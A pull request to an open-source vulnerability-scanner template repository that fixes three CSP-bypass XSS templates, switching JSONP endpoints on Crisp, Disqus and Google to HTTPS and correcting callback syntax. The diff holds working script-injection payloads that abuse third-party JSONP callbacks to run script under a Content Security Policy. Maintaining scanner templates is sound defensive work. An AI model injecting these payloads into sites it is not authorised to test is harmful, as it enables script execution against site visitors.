### PR TITLE
fix(csp-bypass): Correct protocols and payloads for several endpoints

### DIFF
--- a/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="https://client.crisp.chat/settings/website/x/?callback=-alert(1);/*"></script>'
+        - '<script src="https://client.crisp.chat/settings/website/x/?callback=-alert(1)//"></script>'
 
     fuzzing:
       - part: query

--- a/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="http://links.services.disqus.com/api/ping?format=jsonp&key=cfdfcf52dffd0a702a61bad27507376d&loc=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Fhealth%2F2013%2F03%2F21%2F1-in-10-u-s-deaths-blamed-on-salt%2F&subId=2329827&v=1&jsonp=alert"></script>'
+        - '<script src="https://links.services.disqus.com/api/ping?format=jsonp&key=cfdfcf52dffd0a702a61bad27507376d&loc=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Fhealth%2F2013%2F03%2F21%2F1-in-10-u-s-deaths-blamed-on-salt%2F&subId=2329827&v=1&jsonp=alert"></script>'
 
     fuzzing:
       - part: query

--- a/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="http://clients1.google.com/complete/search?callback=alert&q=PIC&nolabels=t&client=youtube&ds=yt&_=1361575554883"></script>'
+        - '<script src="https://clients1.google.com/complete/search?callback=alert&q=PIC&nolabels=t&client=youtube&ds=yt&_=1361575554883"></script>'
 
     fuzzing:
       - part: query


### PR DESCRIPTION
**This commit applies several corrections to the CSP bypass list to align with recent changes in the `renniepak/CSPBypass` repository.**

## Template / PR Information

This PR is the second part of the maintenance effort started in PR https://github.com/projectdiscovery/nuclei-templates/pull/13062. While the previous PR focused on removing non-working endpoints, this one focuses on **fixing** existing entries to ensure they are functional.

The changes include:
- Updating deprecated HTTP endpoints to HTTPS.
- Correcting invalid JSONP payload syntax.

These fixes ensure the bypasses are reliable and work as intended.

- References: https://github.com/renniepak/CSPBypass/commit/eec119bd695587a9f2727d5bb0de8a3dd569dff3



### Additional Details (leave it blank if not applicable)

<img width="2184" height="192" alt="image" src="https://github.com/user-attachments/assets/7a2a7ef3-a377-4f6a-bf3e-3b181839e3ba" />

<img width="2182" height="432" alt="image" src="https://github.com/user-attachments/assets/a8cd3be6-052f-466d-94f3-6e2814d50fc6" />
<img width="2086" height="264" alt="image" src="https://github.com/user-attachments/assets/cb509a0f-55a3-4a76-8ecf-99b9e60207bb" />


## Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)